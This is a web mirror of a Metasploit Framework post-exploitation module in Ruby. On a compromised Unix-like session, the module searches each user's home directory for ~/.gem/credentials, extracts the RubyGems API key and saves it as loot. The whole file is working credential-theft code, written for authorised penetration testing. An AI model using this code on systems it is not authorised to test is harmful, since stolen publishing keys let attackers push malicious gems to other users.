Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/rubygems_api_key.rb
19813 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Unix

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Multi Gather RubyGems API Key',

15
        'Description' => %q{

16
          This module obtains a user's RubyGems API key from ~/.gem/credentials.

17
        },

18
        'Author' => [

19
          'Jonathan Claudius <jclaudius[at]trustwave.com>',

20
          'Brandon Myers <bmyers[at]trustwave.com>'

21
        ],

22
        'Platform' => %w[bsd linux osx unix],

23
        'SessionTypes' => %w[shell],

24
        'License' => MSF_LICENSE,

25
        'Notes' => {

26
          'Stability' => [CRASH_SAFE],

27
          'SideEffects' => [],

28
          'Reliability' => []

29
        }

30
      )

31
    )

32
  end

33


34
  def run

35
    print_status('Finding ~/.gem/credentials')

36
    paths = enum_user_directories.map { |d| d + '/.gem/credentials' }

37
    paths = paths.select { |f| file?(f) }

38


39
    if paths.empty?

40
      print_error('No users found with a ~/.gem/credentials file')

41
      return

42
    end

43


44
    download_key(paths)

45
  end

46


47
  # Ruby gem credentials are pretty standard and can come

48
  # in a few flavors, but the most common are straight yaml

49
  # and json, both of which are colon delimited. I suppose

50
  # you could concievably have more than one, but that'd be

51
  # manually editing, and the first one is probably the best

52
  # one anyway.

53
  def extract_key(path)

54
    data = read_file(path)

55
    keys = data.split(':').select { |k| k =~ /[0-9a-f]{32}/ }

56
    keys.map(&:strip).first

57
  end

58


59
  def download_key(paths)

60
    print_status("Looting #{paths.count} files")

61
    paths.each do |path|

62
      path.chomp!

63
      next if ['.', '..'].include?(path)

64


65
      rubygems_api_key = extract_key(path)

66
      next unless rubygems_api_key

67


68
      print_good("Found a RubyGems API key: #{rubygems_api_key}")

69


70
      loot_path = store_loot(

71
        'rubygems.apikey',

72
        'text/plain',

73
        session,

74
        rubygems_api_key,

75
        'rubygems_api_key.txt',

76
        'RubyGems API key'

77
      )

78


79
      print_good("RubyGems API key stored in #{loot_path}")

80
    end

81
  end

82
end

83


84